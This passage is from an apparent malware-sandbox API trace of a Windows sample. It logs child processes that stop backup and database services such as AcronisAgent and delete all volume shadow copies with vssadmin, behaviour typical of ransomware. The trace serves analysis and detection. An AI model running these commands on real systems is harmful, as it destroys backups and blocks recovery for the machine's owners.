(_String1="accounts", _String2="MSSQLServerADHelper100") returned -12 [0071.310] _wcsicmp (_String1="computer", _String2="MSSQLServerADHelper100") returned -10 [0071.310] _wcsicmp (_String1="config", _String2="MSSQLServerADHelper100") returned -10 [0071.310] _wcsicmp (_String1="continue", _String2="MSSQLServerADHelper100") returned -10 [0071.310] _wcsicmp (_String1="cont", _String2="MSSQLServerADHelper100") returned -10 [0071.310] _wcsicmp (_String1="file", _String2="MSSQLServerADHelper100") returned -7 [0071.310] _wcsicmp (_String1="files", _String2="MSSQLServerADHelper100") returned -7 [0071.310] _wcsicmp (_String1="group", _String2="MSSQLServerADHelper100") returned -6 [0071.310] _wcsicmp (_String1="groups", _String2="MSSQLServerADHelper100") returned -6 [0071.310] _wcsicmp (_String1="help", _String2="MSSQLServerADHelper100") returned -5 [0071.310] _wcsicmp (_String1="helpmsg", _String2="MSSQLServerADHelper100") returned -5 [0071.310] _wcsicmp (_String1="localgroup", _String2="MSSQLServerADHelper100") returned -1 [0071.310] _wcsicmp (_String1="pause", _String2="MSSQLServerADHelper100") returned 3 [0071.310] _wcsicmp (_String1="session", _String2="MSSQLServerADHelper100") returned 6 [0071.310] _wcsicmp (_String1="sessions", _String2="MSSQLServerADHelper100") returned 6 [0071.310] _wcsicmp (_String1="sess", _String2="MSSQLServerADHelper100") returned 6 [0071.310] _wcsicmp (_String1="share", _String2="MSSQLServerADHelper100") returned 6 [0071.310] _wcsicmp (_String1="start", _String2="MSSQLServerADHelper100") returned 6 [0071.310] _wcsicmp (_String1="stats", _String2="MSSQLServerADHelper100") returned 6 [0071.310] _wcsicmp (_String1="statistics", _String2="MSSQLServerADHelper100") returned 6 [0071.310] _wcsicmp (_String1="stop", _String2="MSSQLServerADHelper100") returned 6 [0071.310] _wcsicmp (_String1="time", _String2="MSSQLServerADHelper100") returned 7 [0071.310] _wcsicmp (_String1="user", _String2="MSSQLServerADHelper100") returned 8 [0071.310] _wcsicmp (_String1="users", _String2="MSSQLServerADHelper100") returned 8 [0071.310] _wcsicmp (_String1="msg", _String2="MSSQLServerADHelper100") returned -12 [0071.310] _wcsicmp (_String1="messenger", _String2="MSSQLServerADHelper100") returned -14 [0071.310] _wcsicmp (_String1="receiver", _String2="MSSQLServerADHelper100") returned 5 [0071.310] _wcsicmp (_String1="rcv", _String2="MSSQLServerADHelper100") returned 5 [0071.310] _wcsicmp (_String1="netpopup", _String2="MSSQLServerADHelper100") returned 1 [0071.310] _wcsicmp (_String1="redirector", _String2="MSSQLServerADHelper100") returned 5 [0071.311] _wcsicmp (_String1="redir", _String2="MSSQLServerADHelper100") returned 5 [0071.311] _wcsicmp (_String1="rdr", _String2="MSSQLServerADHelper100") returned 5 [0071.311] _wcsicmp (_String1="workstation", _String2="MSSQLServerADHelper100") returned 10 [0071.311] _wcsicmp (_String1="work", _String2="MSSQLServerADHelper100") returned 10 [0071.311] _wcsicmp (_String1="wksta", _String2="MSSQLServerADHelper100") returned 10 [0071.311] _wcsicmp (_String1="prdr", _String2="MSSQLServerADHelper100") returned 3 [0071.311] _wcsicmp (_String1="devrdr", _String2="MSSQLServerADHelper100") returned -9 [0071.311] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLServerADHelper100") returned -1 [0071.311] _wcsicmp (_String1="server", _String2="MSSQLServerADHelper100") returned 6 [0071.311] _wcsicmp (_String1="svr", _String2="MSSQLServerADHelper100") returned 6 [0071.311] _wcsicmp (_String1="srv", _String2="MSSQLServerADHelper100") returned 6 [0071.311] _wcsicmp (_String1="lanmanserver", _String2="MSSQLServerADHelper100") returned -1 [0071.311] _wcsicmp (_String1="alerter", _String2="MSSQLServerADHelper100") returned -12 [0071.311] _wcsicmp (_String1="netlogon", _String2="MSSQLServerADHelper100") returned 1 [0071.311] _wcsupr (in: _String="MSSQLServerADHelper100" | out: _String="MSSQLSERVERADHELPER100") returned="MSSQLSERVERADHELPER100" [0071.311] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x615438 [0071.589] GetServiceKeyNameW (in: hSCManager=0x615438, lpDisplayName="MSSQLSERVERADHELPER100", lpServiceName=0xb1aaf0, lpcchBuffer=0x1afe88 | out: lpServiceName="", lpcchBuffer=0x1afe88) returned 0 [0071.589] _wcsicmp (_String1="msg", _String2="MSSQLSERVERADHELPER100") returned -12 [0071.589] _wcsicmp (_String1="messenger", _String2="MSSQLSERVERADHELPER100") returned -14 [0071.589] _wcsicmp (_String1="receiver", _String2="MSSQLSERVERADHELPER100") returned 5 [0071.589] _wcsicmp (_String1="rcv", _String2="MSSQLSERVERADHELPER100") returned 5 [0071.589] _wcsicmp (_String1="redirector", _String2="MSSQLSERVERADHELPER100") returned 5 [0071.589] _wcsicmp (_String1="redir", _String2="MSSQLSERVERADHELPER100") returned 5 [0071.589] _wcsicmp (_String1="rdr", _String2="MSSQLSERVERADHELPER100") returned 5 [0071.589] _wcsicmp (_String1="workstation", _String2="MSSQLSERVERADHELPER100") returned 10 [0071.589] _wcsicmp (_String1="work", _String2="MSSQLSERVERADHELPER100") returned 10 [0071.589] _wcsicmp (_String1="wksta", _String2="MSSQLSERVERADHELPER100") returned 10 [0071.589] _wcsicmp (_String1="prdr", _String2="MSSQLSERVERADHELPER100") returned 3 [0071.589] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVERADHELPER100") returned -9 [0071.590] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVERADHELPER100") returned -1 [0071.590] _wcsicmp (_String1="server", _String2="MSSQLSERVERADHELPER100") returned 6 [0071.590] _wcsicmp (_String1="svr", _String2="MSSQLSERVERADHELPER100") returned 6 [0071.590] _wcsicmp (_String1="srv", _String2="MSSQLSERVERADHELPER100") returned 6 [0071.590] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVERADHELPER100") returned -1 [0071.590] _wcsicmp (_String1="alerter", _String2="MSSQLSERVERADHELPER100") returned -12 [0071.590] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVERADHELPER100") returned 1 [0071.590] NetServiceControl (in: servername=0x0, service="MSSQLSERVERADHELPER100", opcode=0x0, arg=0x0, bufptr=0x1afe84 | out: bufptr=0x1afe84) returned 0x889 [0071.591] wcscpy_s (in: _Destination=0xb1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0071.591] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74150000 [0071.591] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74150000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0071.592] GetFileType (hFile=0xb) returned 0x2 [0071.593] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1afda4 | out: lpMode=0x1afda4) returned 1 [0071.593] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1afdc4, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x1afdc4*=0x1e) returned 1 [0071.593] GetFileType (hFile=0xb) returned 0x2 [0071.594] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1afda4 | out: lpMode=0x1afda4) returned 1 [0071.594] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1afdc4, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x1afdc4*=0x2) returned 1 [0071.594] _ultow (in: _Dest=0x889, _Radix=1768948 | out: _Dest=0x889) returned="2185" [0071.594] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74150000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0071.594] GetFileType (hFile=0xb) returned 0x2 [0071.594] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1afdb0 | out: lpMode=0x1afdb0) returned 1 [0071.595] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1afdd0, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x1afdd0*=0x34) returned 1 [0071.595] GetFileType (hFile=0xb) returned 0x2 [0071.595] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1afdb0 | out: lpMode=0x1afdb0) returned 1 [0071.595] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1afdd0, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x1afdd0*=0x2) returned 1 [0071.596] NetApiBufferFree (Buffer=0x611c20) returned 0x0 [0071.596] NetApiBufferFree (Buffer=0x611c38) returned 0x0 [0071.596] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerADHelper100" [0071.596] exit (_Code=2) Process: id = "60" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x75ddd000" os_pid = "0x40c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x88c" cmd_line = "C:\\Windows\\system32\\net1 stop AcronisAgent" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 183 os_tid = 0x914 [0071.335] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10fe1c | out: lpSystemTimeAsFileTime=0x10fe1c*(dwLowDateTime=0x993ca650, dwHighDateTime=0x1d57b18)) [0071.335] GetCurrentProcessId () returned 0x40c [0071.335] GetCurrentThreadId () returned 0x914 [0071.335] GetTickCount () returned 0x114bbc1 [0071.335] QueryPerformanceCounter (in: lpPerformanceCount=0x10fe14 | out: lpPerformanceCount=0x10fe14*=19155696532) returned 1 [0071.336] GetModuleHandleA (lpModuleName=0x0) returned 0xb00000 [0071.336] __set_app_type (_Type=0x1) [0071.336] __p__fmode () returned 0x74eb31f4 [0071.336] __p__commode () returned 0x74eb31fc [0071.336] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb0ffe6) returned 0x0 [0071.336] __getmainargs (in: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068, _DoWildCard=0, _StartInfo=0xb19024 | out: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068) returned 0 [0071.336] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.336] GetConsoleOutputCP () returned 0x1b5 [0071.336] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb19080 | out: lpCPInfo=0xb19080) returned 1 [0071.336] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.339] sprintf_s (in: _DstBuf=0x10fdd4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0071.340] setlocale (category=0, locale=".437") returned="English_United States.437" [0071.342] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0071.342] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0071.342] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AcronisAgent" [0071.342] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10fba0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0071.342] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x62) returned 0x553bb0 [0071.342] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10fda4 | out: Buffer=0x10fda4*=0x551c08) returned 0x0 [0071.342] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10fda4 | out: Buffer=0x10fda4*=0x551c20) returned 0x0 [0071.342] _fileno (_File=0x74eb2900) returned 0 [0071.342] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0071.342] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0071.342] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0071.342] _wcsicmp (_String1="config", _String2="stop") returned -16 [0071.342] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0071.342] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0071.342] _wcsicmp (_String1="file", _String2="stop") returned -13 [0071.342] _wcsicmp (_String1="files", _String2="stop") returned -13 [0071.342] _wcsicmp (_String1="group", _String2="stop") returned -12 [0071.342] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0071.342] _wcsicmp (_String1="help", _String2="stop") returned -11 [0071.342] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0071.342] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0071.342] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0071.342] _wcsicmp (_String1="session", _String2="stop") returned -15 [0071.342] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0071.342] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0071.343] _wcsicmp (_String1="share", _String2="stop") returned -12 [0071.343] _wcsicmp (_String1="start", _String2="stop") returned -14 [0071.343] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0071.343] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0071.343] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0071.343] _wcsicmp (_String1="accounts", _String2="AcronisAgent") returned -15 [0071.343] _wcsicmp (_String1="computer", _String2="AcronisAgent") returned 2 [0071.343] _wcsicmp (_String1="config", _String2="AcronisAgent") returned 2 [0071.343] _wcsicmp (_String1="continue", _String2="AcronisAgent") returned 2 [0071.343] _wcsicmp (_String1="cont", _String2="AcronisAgent") returned 2 [0071.343] _wcsicmp (_String1="file", _String2="AcronisAgent") returned 5 [0071.343] _wcsicmp (_String1="files", _String2="AcronisAgent") returned 5 [0071.343] _wcsicmp (_String1="group", _String2="AcronisAgent") returned 6 [0071.343] _wcsicmp (_String1="groups", _String2="AcronisAgent") returned 6 [0071.343] _wcsicmp (_String1="help", _String2="AcronisAgent") returned 7 [0071.343] _wcsicmp (_String1="helpmsg", _String2="AcronisAgent") returned 7 [0071.343] _wcsicmp (_String1="localgroup", _String2="AcronisAgent") returned 11 [0071.343] _wcsicmp (_String1="pause", _String2="AcronisAgent") returned 15 [0071.343] _wcsicmp (_String1="session", _String2="AcronisAgent") returned 18 [0071.343] _wcsicmp (_String1="sessions", _String2="AcronisAgent") returned 18 [0071.343] _wcsicmp (_String1="sess", _String2="AcronisAgent") returned 18 [0071.343] _wcsicmp (_String1="share", _String2="AcronisAgent") returned 18 [0071.343] _wcsicmp (_String1="start", _String2="AcronisAgent") returned 18 [0071.343] _wcsicmp (_String1="stats", _String2="AcronisAgent") returned 18 [0071.343] _wcsicmp (_String1="statistics", _String2="AcronisAgent") returned 18 [0071.343] _wcsicmp (_String1="stop", _String2="AcronisAgent") returned 18 [0071.343] _wcsicmp (_String1="time", _String2="AcronisAgent") returned 19 [0071.343] _wcsicmp (_String1="user", _String2="AcronisAgent") returned 20 [0071.343] _wcsicmp (_String1="users", _String2="AcronisAgent") returned 20 [0071.343] _wcsicmp (_String1="msg", _String2="AcronisAgent") returned 12 [0071.343] _wcsicmp (_String1="messenger", _String2="AcronisAgent") returned 12 [0071.343] _wcsicmp (_String1="receiver", _String2="AcronisAgent") returned 17 [0071.343] _wcsicmp (_String1="rcv", _String2="AcronisAgent") returned 17 [0071.343] _wcsicmp (_String1="netpopup", _String2="AcronisAgent") returned 13 [0071.343] _wcsicmp (_String1="redirector", _String2="AcronisAgent") returned 17 [0071.343] _wcsicmp (_String1="redir", _String2="AcronisAgent") returned 17 [0071.343] _wcsicmp (_String1="rdr", _String2="AcronisAgent") returned 17 [0071.344] _wcsicmp (_String1="workstation", _String2="AcronisAgent") returned 22 [0071.344] _wcsicmp (_String1="work", _String2="AcronisAgent") returned 22 [0071.344] _wcsicmp (_String1="wksta", _String2="AcronisAgent") returned 22 [0071.344] _wcsicmp (_String1="prdr", _String2="AcronisAgent") returned 15 [0071.344] _wcsicmp (_String1="devrdr", _String2="AcronisAgent") returned 3 [0071.344] _wcsicmp (_String1="lanmanworkstation", _String2="AcronisAgent") returned 11 [0071.344] _wcsicmp (_String1="server", _String2="AcronisAgent") returned 18 [0071.344] _wcsicmp (_String1="svr", _String2="AcronisAgent") returned 18 [0071.344] _wcsicmp (_String1="srv", _String2="AcronisAgent") returned 18 [0071.344] _wcsicmp (_String1="lanmanserver", _String2="AcronisAgent") returned 11 [0071.344] _wcsicmp (_String1="alerter", _String2="AcronisAgent") returned 9 [0071.344] _wcsicmp (_String1="netlogon", _String2="AcronisAgent") returned 13 [0071.344] _wcsupr (in: _String="AcronisAgent" | out: _String="ACRONISAGENT") returned="ACRONISAGENT" [0071.344] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x555490 [0071.602] GetServiceKeyNameW (in: hSCManager=0x555490, lpDisplayName="ACRONISAGENT", lpServiceName=0xb1aaf0, lpcchBuffer=0x10fd40 | out: lpServiceName="", lpcchBuffer=0x10fd40) returned 0 [0071.602] _wcsicmp (_String1="msg", _String2="ACRONISAGENT") returned 12 [0071.602] _wcsicmp (_String1="messenger", _String2="ACRONISAGENT") returned 12 [0071.602] _wcsicmp (_String1="receiver", _String2="ACRONISAGENT") returned 17 [0071.602] _wcsicmp (_String1="rcv", _String2="ACRONISAGENT") returned 17 [0071.602] _wcsicmp (_String1="redirector", _String2="ACRONISAGENT") returned 17 [0071.602] _wcsicmp (_String1="redir", _String2="ACRONISAGENT") returned 17 [0071.602] _wcsicmp (_String1="rdr", _String2="ACRONISAGENT") returned 17 [0071.602] _wcsicmp (_String1="workstation", _String2="ACRONISAGENT") returned 22 [0071.602] _wcsicmp (_String1="work", _String2="ACRONISAGENT") returned 22 [0071.602] _wcsicmp (_String1="wksta", _String2="ACRONISAGENT") returned 22 [0071.602] _wcsicmp (_String1="prdr", _String2="ACRONISAGENT") returned 15 [0071.602] _wcsicmp (_String1="devrdr", _String2="ACRONISAGENT") returned 3 [0071.602] _wcsicmp (_String1="lanmanworkstation", _String2="ACRONISAGENT") returned 11 [0071.602] _wcsicmp (_String1="server", _String2="ACRONISAGENT") returned 18 [0071.602] _wcsicmp (_String1="svr", _String2="ACRONISAGENT") returned 18 [0071.602] _wcsicmp (_String1="srv", _String2="ACRONISAGENT") returned 18 [0071.603] _wcsicmp (_String1="lanmanserver", _String2="ACRONISAGENT") returned 11 [0071.603] _wcsicmp (_String1="alerter", _String2="ACRONISAGENT") returned 9 [0071.603] _wcsicmp (_String1="netlogon", _String2="ACRONISAGENT") returned 13 [0071.603] NetServiceControl (in: servername=0x0, service="ACRONISAGENT", opcode=0x0, arg=0x0, bufptr=0x10fd3c | out: bufptr=0x10fd3c) returned 0x889 [0071.603] wcscpy_s (in: _Destination=0xb1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0071.603] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74200000 [0071.604] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74200000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0071.605] GetFileType (hFile=0xb) returned 0x2 [0071.605] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10fc5c | out: lpMode=0x10fc5c) returned 1 [0071.606] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x10fc7c, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x10fc7c*=0x1e) returned 1 [0071.606] GetFileType (hFile=0xb) returned 0x2 [0071.607] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10fc5c | out: lpMode=0x10fc5c) returned 1 [0071.607] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10fc7c, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x10fc7c*=0x2) returned 1 [0071.607] _ultow (in: _Dest=0x889, _Radix=1113260 | out: _Dest=0x889) returned="2185" [0071.607] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74200000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0071.607] GetFileType (hFile=0xb) returned 0x2 [0071.607] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10fc68 | out: lpMode=0x10fc68) returned 1 [0071.608] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x10fc88, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x10fc88*=0x34) returned 1 [0071.608] GetFileType (hFile=0xb) returned 0x2 [0071.608] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10fc68 | out: lpMode=0x10fc68) returned 1 [0071.608] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10fc88, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x10fc88*=0x2) returned 1 [0071.609] NetApiBufferFree (Buffer=0x551c08) returned 0x0 [0071.609] NetApiBufferFree (Buffer=0x551c20) returned 0x0 [0071.609] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AcronisAgent" [0071.609] exit (_Code=2) Process: id = "61" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x7a642000" os_pid = "0x900" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "42" os_parent_pid = "0xbdc" cmd_line = "vssadmin.exe delete shadows /all /quiet " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 184 os_tid = 0x640 Thread: id = 193 os_tid = 0xbec Thread: id = 200 os_tid = 0x15c Thread: id = 201 os_tid = 0x318 Thread: id = 202 os_tid = 0x790 Process: id = "62" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x738d0000" os_pid = "0x910" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "50" os_parent_pid = "0x8ec" cmd_line = "C:\\Windows\\system32\\net1 stop cbVSCService11" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 185 os_tid = 0x6a8 [0071.825] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x17fbf4 | out: lpSystemTimeAsFileTime=0x17fbf4*(dwLowDateTime=0x998670f0, dwHighDateTime=0x1d57b18)) [0071.825] GetCurrentProcessId () returned 0x910 [0071.825] GetCurrentThreadId () returned 0x6a8 [0071.825] GetTickCount () returned 0x114bda5 [0071.825] QueryPerformanceCounter (in: lpPerformanceCount=0x17fbec | out: lpPerformanceCount=0x17fbec*=19204616916) returned 1 [0071.825] GetModuleHandleA (lpModuleName=0x0) returned 0xb00000 [0071.825] __set_app_type (_Type=0x1) [0071.825] __p__fmode () returned 0x74eb31f4 [0071.825] __p__commode () returned 0x74eb31fc [0071.825] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb0ffe6) returned 0x0 [0071.825] __getmainargs (in: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068, _DoWildCard=0, _StartInfo=0xb19024 | out: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068) returned 0 [0071.825] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.825] GetConsoleOutputCP () returned 0x1b5 [0071.871] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb19080 | out: lpCPInfo=0xb19080) returned 1 [0071.871] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.888] sprintf_s (in: _DstBuf=0x17fbac, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0071.888] setlocale (category=0, locale=".437") returned="English_United States.437" [0071.897] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0071.897] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0071.897] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop cbVSCService11" [0071.897] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x17f978, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0071.897] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x66) returned 0x5f3bb0 [0071.897] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x17fb7c | out: Buffer=0x17fb7c*=0x5f1c08) returned 0x0 [0071.898] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x17fb7c | out: Buffer=0x17fb7c*=0x5f1c20) returned 0x0 [0071.898] _fileno (_File=0x74eb2900) returned 0 [0071.898] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0071.898] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0071.898] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0071.898] _wcsicmp (_String1="config", _String2="stop") returned -16 [0071.898] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0071.898] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0071.898] _wcsicmp (_String1="file", _String2="stop") returned -13 [0071.898] _wcsicmp (_String1="files", _String2="stop") returned -13 [0071.898] _wcsicmp (_String1="group", _String2="stop") returned -12 [0071.898] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0071.898] _wcsicmp (_String1="help", _String2="stop") returned -11 [0071.898] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0071.898] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0071.898] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0071.898] _wcsicmp (_String1="session", _String2="stop") returned -15 [0071.898] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0071.898] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0071.898] _wcsicmp (_String1="share", _String2="stop") returned -12 [0071.898] _wcsicmp (_String1="start", _String2="stop") returned -14 [0071.898] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0071.898] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0071.898] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0071.898] _wcsicmp (_String1="accounts", _String2="cbVSCService11") returned -2 [0071.898] _wcsicmp (_String1="computer", _String2="cbVSCService11") returned 13 [0071.898] _wcsicmp (_String1="config", _String2="cbVSCService11") returned 13 [0071.898] _wcsicmp (_String1="continue", _String2="cbVSCService11") returned 13 [0071.898] _wcsicmp (_String1="cont", _String2="cbVSCService11") returned 13 [0071.898] _wcsicmp (_String1="file", _String2="cbVSCService11") returned 3 [0071.898] _wcsicmp (_String1="files", _String2="cbVSCService11") returned 3 [0071.898] _wcsicmp (_String1="group", _String2="cbVSCService11") returned 4 [0071.898] _wcsicmp (_String1="groups", _String2="cbVSCService11") returned 4 [0071.898] _wcsicmp (_String1="help", _String2="cbVSCService11") returned 5 [0071.898] _wcsicmp (_String1="helpmsg", _String2="cbVSCService11") returned 5 [0071.899] _wcsicmp (_String1="localgroup", _String2="cbVSCService11") returned 9 [0071.899] _wcsicmp (_String1="pause", _String2="cbVSCService11") returned 13 [0071.899] _wcsicmp (_String1="session", _String2="cbVSCService11") returned 